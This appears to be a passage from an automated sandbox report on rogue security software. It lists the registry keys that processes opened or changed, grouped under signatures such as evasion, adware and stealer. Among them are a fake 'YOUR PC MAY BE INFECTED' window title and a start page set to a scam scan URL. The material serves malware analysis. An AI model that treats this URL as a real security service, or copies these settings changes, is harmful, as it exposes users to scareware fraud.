Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\system32\taskmgr.exe N/A
Set value (data) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Device Parameters\Partmgr\SnapshotDataCache = 534e41505041525401000000700000008ec7416a0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\system32\vssvc.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{540b947e-8b40-45bc-a8a2-6a0b894cbda2}\0009 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{83da6326-97a6-4088-9453-a1923f573b29}\0009 C:\Windows\system32\svchost.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{259abffc-50a7-47ce-af08-68c9a7d73366}\000C C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\007A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\HardwareID C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_MSFT&PROD_VIRTUAL_DVD-ROM\2&1F4ADFFE&0&000001 C:\Windows\system32\DrvInst.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0004 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\FriendlyName C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 C:\Windows\system32\svchost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\005A C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{cf73bb51-3abf-44a2-85e0-9a3dc7a12132}\0006 C:\Windows\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files (x86)\Security Central\Security Central.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Window Title = "YOUR PC MAY BE INFECTED WITH SPYWARE OR OTHER MALICIOUS ITEMS" \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Program Files (x86)\Security Central\Security Central.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbamtray.exe = "11000" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Desktop\General\WallpaperSource = "C:\\Users\\Admin\\AppData\\Roaming\\1.gif" C:\Users\Admin\Desktop\[email protected] N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\IESettingSync\SlowSettingTypesChanged = "2" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\mbam.exe = "11000" C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Desktop\General C:\Users\Admin\Desktop\[email protected] N/A
Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\Malwarebytes.exe = "11000" C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Use FormSuggest = "Yes" C:\Users\Admin\Desktop\[email protected] N/A
Set value (int) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main C:\Users\Admin\Desktop\[email protected] N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main \??\c:\windows\antivirus-platinum.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files (x86)\Security Central\Security Central.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Software\Microsoft\Internet Explorer\IESettingSync C:\Program Files (x86)\Security Central\Security Central.exe N/A

Modifies Internet Explorer start page

stealer
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Internet Explorer\Main\Start Page = "http://secureservices2010.webs.com/scan" \??\c:\windows\antivirus-platinum.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages\en-US = "1" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script\Settings C:\Windows\syswow64\MsiExec.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Policies\Microsoft\Office\15.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs C:\Windows\system32\DrvInst.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates C:\Windows\system32\DrvInst.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|4" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\Expires = "int64_t|1711366280" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\15.0 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\mbupdatrV5.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ConfigContextData\ChunkCount = "uint64_t|0" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key deleted \REGISTRY\USER\.DEFAULT\SOFTWARE\CLASSES\LOCAL SETTINGS\MUICACHE\23 C:\Windows\system32\msiexec.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\Office\15.0 C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs C:\PROGRAMDATA\MALWAREBYTES\MBAMSERVICE\updatrpkg\mbupdatrV5.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\officeclicktorun\ETag = "std::wstring|\"/NWytbvqlmwWcvZRUZ6XMvLSSIJCtYEsMHi76l2vBp8=\"" C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security\Trusted Protocols\All Applications\malwarebytes: C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates\8AD5C9987E6F190BD6F5416E2DE44CCD641D8CDA C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ExperimentEcs\officeclicktorun\Overrides C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
Key created \REGISTRY\USER\S-1-5-19\SOFTWARE\Policies\Microsoft\Office\16.0\Common\Security C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe N/A
